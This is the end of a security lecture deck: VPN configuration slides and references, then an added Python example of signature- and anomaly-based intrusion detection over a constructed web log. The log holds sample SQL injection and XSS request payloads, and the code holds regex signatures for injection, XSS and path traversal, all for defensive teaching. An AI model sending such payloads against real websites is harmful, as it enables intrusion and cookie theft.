(figure: VPN connectivity overview, courtesy http://en.wikipedia.org/wiki/VPN)

VPN Configurations
• Host-to-host
• Host-to-gateway
• Gateway-to-gateway

VPN Methodology
• The basic concept behind a VPN is securing a communication channel with encryption
• Communication can be safeguarded through encryption at many different layers of the network: application, transport, network and data link

References
• E. Bertino, R. Sandhu, "Database Security – Concepts, Approaches, and Challenges", IEEE Transactions on Dependable and Secure Computing, 2(1), 2005.
• L. Sweeney, "k-Anonymity: a Model for Protecting Privacy", http://privacy.cs.cmu.edu/people/sweeney/cv.html#publications
• A. Pfitzmann et al., "Anonymity, Unobservability, Pseudonymity and Identity Management – A Proposal for Terminology", http://dud.inf.tu-dresden.de/Literatur_VI.shtml
• http://homes.cerias.purdue.edu
• http://www.redbooks.ibm.com/redpapers/pdfs/redp4397.pdf
• http://en.wikipedia.org

Thank You
dittin@cdac.in
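The IDS/IPS slides above list signature-based and anomaly-based detection as the two main methods. The following added example (not code from the slides) implements both over a constructed web-server access log: a signature engine that URL-decodes each request and matches it against patterns for the SQL injection and XSS payloads shown earlier in the deck, and a statistical anomaly check that flags any source sending more requests per log-second than a threshold (a simple view of the request-flood behaviour an NBA system looks for). The log lines, IP addresses, signature names and threshold are assumptions made for the demonstration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed access-log lines in common log format (illustrative only).
BASE_LINES = [
    '10.0.0.5 - - [10/Oct/2010:13:55:36 +0000] "GET /index.php?id=0 HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Oct/2010:13:55:37 +0000] "GET /index.asp?id=blah%27%20or%201%3D1-- HTTP/1.1" 200 9120',
    '10.0.0.7 - - [10/Oct/2010:13:55:40 +0000] "GET /search?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 300',
    '10.0.0.9 - - [10/Oct/2010:13:56:01 +0000] "GET /login HTTP/1.1" 200 200',
]

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*"'
    r' (?P<status>\d+) (?P<size>\d+)')

# Signature rules: (name, pattern applied to the URL-decoded request path).
SIGNATURES = [
    ("sqli-tautology", re.compile(r"'\s*or\s+1\s*=\s*1", re.I)),
    ("sqli-comment", re.compile(r"--|/\*")),
    ("xss-script-tag", re.compile(r"<script", re.I)),
    ("traversal", re.compile(r"\.\./")),
]


def build_sample_log():
    """The four base lines plus a burst of 40 login attempts from one source
    in the same second, constructed to trigger the rate anomaly."""
    burst = [f'10.0.0.9 - - [10/Oct/2010:13:56:01 +0000] "GET /login?try={i} HTTP/1.1" 401 200'
             for i in range(40)]
    return "\n".join(BASE_LINES + burst) + "\n"


def parse_line(line):
    """Return the fields of one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def decode_path(path, rounds=3):
    """URL-decode repeatedly (bounded) so that double-encoded payloads are
    matched in their final form rather than slipping past the signatures."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def signature_matches(path):
    """Names of all signatures that fire on the decoded request path."""
    decoded = decode_path(path)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def analyze(log_text, rate_threshold=20):
    """Run both detection methods over the log. Signature alerts are
    (ip, signature, decoded path); anomaly alerts are (ip, second, count)
    for sources exceeding rate_threshold requests within one log-second."""
    records = [r for r in (parse_line(l) for l in log_text.splitlines()) if r]
    sig_alerts, per_second = [], Counter()
    for r in records:
        per_second[(r["ip"], r["ts"])] += 1
        for name in signature_matches(r["path"]):
            sig_alerts.append((r["ip"], name, decode_path(r["path"])))
    anomaly_alerts = [(ip, ts, n) for (ip, ts), n in per_second.items() if n > rate_threshold]
    return {"signature_alerts": sig_alerts, "anomaly_alerts": anomaly_alerts}


if __name__ == "__main__":
    result = analyze(build_sample_log())
    for a in result["signature_alerts"]:
        print("SIG ", a)
    for a in result["anomaly_alerts"]:
        print("RATE", a)
```

The two methods fail in opposite ways: signatures miss anything not yet written down (the same SQL injection spelled with /**/ instead of spaces, or with a tautology other than 1=1), while the rate check fires on any legitimately busy client and says nothing about a single carefully crafted request. Production systems run both, and add the stateful protocol analysis the slides mention to catch malformed exchanges neither method sees.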